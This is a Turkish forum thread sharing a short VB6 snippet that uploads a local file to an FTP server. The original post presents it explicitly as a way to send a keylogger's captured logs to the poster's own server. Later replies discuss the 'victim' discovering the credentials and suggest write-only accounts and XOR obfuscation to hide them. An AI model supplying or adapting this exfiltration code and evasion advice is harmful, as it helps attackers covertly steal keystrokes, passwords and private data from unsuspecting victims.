• Bu site çerezler kullanır. Bu siteyi kullanmaya devam ederek çerez kullanımımızı kabul etmiş olursunuz. Daha fazla bilgi edin.

Ftp'ye Dosya Upload Etme vb6

Konuyu Okuyan Kişiler (0)

XFQ

webmaster.tc
Örneğin Bir Programınız Var ( Keylogger v.b) Programda Tutulan Logları Ftp Serveriniz Üzerinden Görmek İstiyorsanız Bu Code İşinize Yarıyabilir...

Gerekli Components : İnternet Transfer Control 6.0

Inet1.URL ="Ftp Adresiniz"

Inet1.UserName ="Ftp İsminiz"

Inet1.Password ="Ftp Şifreniz"

Inet1.Execute , "SEND C:\\deneme.txt deneme.txt "

Do While Inet1.StillExecuting
DoEvents
Loop

Code'daki Kırmızı Yazılı Yer

Ftpye Upload Edilecek Dosyanın Yeri ve Ftpde Gözükecek İsmi

cebom25

webmaster.tc
Hocm peki kurban keylogger oldugunu anlayinca vb6 kaynak kod okuma ile ftp bilgilerimizi ogrenemez mi ? Ve bunu sifrelemenin bir yolu varmidir. Tesekkurler

gkbrk

webmaster.tc
Hocm peki kurban keylogger oldugunu anlayinca vb6 kaynak kod okuma ile ftp bilgilerimizi ogrenemez mi ? Ve bunu sifrelemenin bir yolu varmidir. Tesekkurler
Sadece keylogger dosyasına yazma izni olan hesap yazarsın. Veya FTP serveri locale kurarsın. Zaten gidip web sitenin FTP şifresini programa yazarsan tabiki öğrenirler.

cebom25

webmaster.tc
Sadece keylogger dosyasına yazma izni olan hesap yazarsın. Veya FTP serveri locale kurarsın. Zaten gidip web sitenin FTP şifresini programa yazarsan tabiki öğrenirler.
en iyisi ben x0r ile şifrelemeye devam edeyim x0r 'ada pek güvenmiyorum ama ne yapalım :) ftp için daha çok kod bekliyordum 3-4 satır kodmuş :)